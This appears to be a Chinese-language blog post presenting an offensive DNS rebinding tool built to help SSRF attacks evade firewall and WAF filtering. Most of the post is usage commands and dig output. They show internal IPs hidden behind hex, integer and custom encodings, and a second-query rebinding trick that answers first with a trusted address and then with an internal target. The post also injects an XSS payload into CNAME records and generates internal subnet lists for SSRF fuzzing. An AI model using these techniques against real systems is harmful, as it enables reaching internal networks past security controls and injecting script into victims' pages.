Dns Auto Rebinding
25 Jun 2017 - Tr3jer_CongRong
ssrf时难免会被防火墙拦截恶意返回值,使用过xip.io但效果一般。项目地址: Github
ssrf、ssrf内网地址fuzz、dns二次rebinding、支持ipv4/ipv6、支持ip地址转换码、dns记录污染(文末一个0day为例)。脑图在脑子里,懒得画了。
support Record Type and Encoding:
MX = ipv4/ipv6/hex
A = ipv4/en/int/hex
AAAA = ipv6/int/hex
CNAME = ipv4/ipv6/hex
配置监听服务器example.com:
record type | record | record value |
---|---|---|
A | ns | server ip |
NS | test | ns.example.com |
sudo pip install ipaddr
修改lib/config.conf: maindomain = test.example.com. 注意根地址.要加
Usage: sudo python main.py {Options}
Options:
-h, --help show this help message and exit
-t 300, --TTL=300 ttl value , 0 By Default
-y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX
Record Type , A By Default
-e int/hex/en, --Encoding=int/hex/en
Record Encoding , None By Default
-r, --Rebinding The Second Time Query Return Target Ip
-p "<script>alert(/xss/)</script>", --payload="<script>alert(/xss/)</script>"
Specified Record , Support CNAME/MX
-y选项指定以什么记录类型返回:
-y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX Record Type , A By Default
-t选项指定TTL值:
-t 300, --TTL=300 ttl value , 0 By Default
直接A记录返回ipv4地址:
sudo ./main.py
➜ ~ dig 192.168.1.1.test.example.com
; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50359
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;192.168.1.1.test.example.com. IN A
;; ANSWER SECTION:
192.168.1.1.test.example.com. 0 IN A 192.168.1.1
;; AUTHORITY SECTION:
test.example.com. 227 IN NS ns.example.com.
server:
[21:54:16] client ip:44486 => A => 192.168.1.1.test.example.com.
hex编码:
sudo ./main.py -e hex
➜ ~ dig 31302e302e302e31.test.example.com
; <<>> DiG 9.8.3-P1 <<>> 31302e302e302e31.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;31302e302e302e31.test.example.com. IN A
;; ANSWER SECTION:
31302e302e302e31.test.example.com. 0 IN A 10.0.0.1
;; AUTHORITY SECTION:
test.example.com. 600 IN NS ns.example.com.
server:
[22:00:42] client ip:30150 => A => 31302e302e302e31.test.example.com.
int编码:
sudo ./main.py -e int
➜ ~ dig 3232235777.test.example.com
; <<>> DiG 9.8.3-P1 <<>> 3232235777.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18066
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;3232235777.test.example.com. IN A
;; ANSWER SECTION:
3232235777.test.example.com. 0 IN A 192.168.1.1
;; AUTHORITY SECTION:
test.example.com. 456 IN NS ns.example.com.
server:
[22:03:00] client ip:5240 => A => 3232235777.test.example.com.
因为waf会识别出内网地址才用的上本项目,那么waf大可识别进制转换这种,所以要自己写个地址转换方法:
num to en:
./lib/common.py 192.168.1.1
1. Single IP Covert For En
2. Build IP List
[+] [1 By Default/2]
bjckbgikbkb
sudo ./main.py -e en
➜ ~ dig bjckbgikbkb.test.example.com
; <<>> DiG 9.8.3-P1 <<>> bjckbgikbkb.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5115
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;bjckbgikbkb.test.example.com. IN A
;; ANSWER SECTION:
bjckbgikbkb.test.example.com. 0 IN A 192.168.1.1
;; AUTHORITY SECTION:
test.example.com. 20 IN NS ns.example.com.
server:
[22:10:22] client ip:8434 => A => bjckbgikbkb.test.example.com.
dns二次rebinding:
sudo ./main.py -r
Input Safe Ip? [Address/Req By Default]8.8.8.8
选择性输入目标信任的地址,比如在ssrf时防火墙在验证dns返回值是否存在于白名单。默认为发起请求的地址。(记得特殊情况需要指定记录类型)
第一次:
➜ ~ dig 192.168.1.1.test.example.com
; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59544
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;192.168.1.1.test.example.com. IN A
;; ANSWER SECTION:
192.168.1.1.test.example.com. 0 IN A 8.8.8.8
;; AUTHORITY SECTION:
test.example.com. 461 IN NS ns.example.com.
第二次:
➜ ~ dig 192.168.1.1.test.example.com
; <<>> DiG 9.8.3-P1 <<>> 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45312
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;192.168.1.1.test.example.com. IN A
;; ANSWER SECTION:
192.168.1.1.test.example.com. 0 IN A 192.168.1.1
;; AUTHORITY SECTION:
test.example.com. 501 IN NS ns.example.com.
dns记录污染:
sudo ./main.py -p "<script>alert(/xss/)</script>" -y CNAME
➜ ~ dig test.example.com
; <<>> DiG 9.8.3-P1 <<>> test.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5073
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;test.example.com. IN A
;; ANSWER SECTION:
test.example.com. 0 IN CNAME <script>alert\(/xss/\)</script>test.example.com.
这个怎么玩取决于你的小脑袋瓜的脑回路了。如果防火墙还要验证是否为信任地址的话修改lib/common.py:
elif payload != 'None' and payload.find(mainDomain) == -1:
record = payload + "信任地址."
ipListBuild: 批量生成网段地址,选择性编码,适合ssrf内网地址fuzz。
python lib/common.py 192.168.1.1
1. Single IP Covert For En
2. Build IP List
[+] [1 By Default/2]2
[+] Please Input Segment Length [24 By Default]
[+] Please Input Encoding ['ipv4' By Default]hex
[+] Please Input Server Root Address [test.example.com By Default]
[+] Stored in the 20170625223912_test_example_com_hex.txt
[root@VM_34_252_centos dnsAutoRebinding]# head -n 5 20170625223912_test_example_com_hex.txt
3139322e3136382e312e31.test.example.com
3139322e3136382e312e32.test.example.com
3139322e3136382e312e33.test.example.com
3139322e3136382e312e34.test.example.com
3139322e3136382e312e35.test.example.com